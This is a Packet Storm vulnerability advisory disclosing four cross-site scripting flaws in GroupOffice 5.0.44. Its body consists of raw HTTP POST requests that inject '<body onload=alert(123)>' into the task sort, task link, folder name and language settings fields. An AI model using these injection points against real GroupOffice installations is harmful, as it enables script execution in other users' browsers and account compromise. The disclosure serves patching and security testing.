GroupOffice 5.0.44 Cross Site Scripting

2014-02-27T00:00:00
ID PACKETSTORM:125449
Type packetstorm
Reporter HauntIT
Modified 2014-02-27T00:00:00

Description

                                        
                                            `# ==============================================================  
# Title ...| GroupOffice Multiple XSS  
# Version .| groupoffice-com-5.0.44.tar.gz   
# Date ....| 27.02.2014  
# Found ...| HauntIT Blog  
# Home ....| https://www.group-office.com/  
# ==============================================================  
  
  
# ==============================================================  
# 1. XSS  
  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/portlet/portletGrid&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
sort='><body onload=alert(123)>&dir=ASC&groupBy=tasklist_name&groupDir=ASC&security_token=PRWJsDvCpVw4kElX2zBN  
---<request>---  
  
  
  
# ==============================================================  
# 2. XSS  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/task/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
task=task&tmp_files=&id=0&security_token=PRWJsDvCpVw4kElX2zBN&name=asdasd&link=<body onload=alert(123)>&start_time=27-02-2014&due_time=27-02-2014&status=NEEDS-ACTION&percentage_complete=0&tasklist_id=3&category_id=&priority=1&description=&interval=1&freq=&col_9=  
---<request>---  
  
  
  
# ==============================================================  
# 3. XSS  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=files/folder/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
parent_id=36&security_token=PRWJsDvCpVw4kElX2zBN&name=<body onload=alert(123)>  
---<request>---  
  
  
  
  
# ==============================================================  
# 4. XSS  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=settings/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
tmp_files=&id=3&security_token=PRWJsDvCpVw4kElX2zBN&language=<body onload=alert(123)>&timezone=Asia%2FJakarta&dateformat=-%3AdmY&time_format=H%3Ai&first_weekday=1&holidayset=en&thousands_separator=%2C&decimal_separator=.&currency=%E2%82%AC&list_separator=%3B&text_separator=%22&theme=Group-Office&start_module=summary&max_rows_list=30&sort_name=last_name&mute_sound=0&mute_reminder_sound=0&mute_new_mail_sound=0&popup_reminders=0&mail_reminders=0&show_smilies=1&auto_punctuation=0&current_password=&password=&passwordConfirm=&first_name=Demo&middle_name=&last_name=User&title=&suffix=&initials=&sex=M&birthday=&department=&function=CEO&email=demo%40acmerpp.demo&email2=&email3=&home_phone=&fax=&cellular=06-12345678&work_phone=&work_fax=&address=1111%20Broadway&address_no=&zip=10019&city=New%20York&state=NY&country=US&use_html_markup=on&font_size=12px&comments_enable_read_more=0&reminder_value=&reminder_multiplier=60&background=EBF1E2&default_calendar_id=3&show_statuses=1&default_tasklist_id=3  
---<request>---  
  
  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
`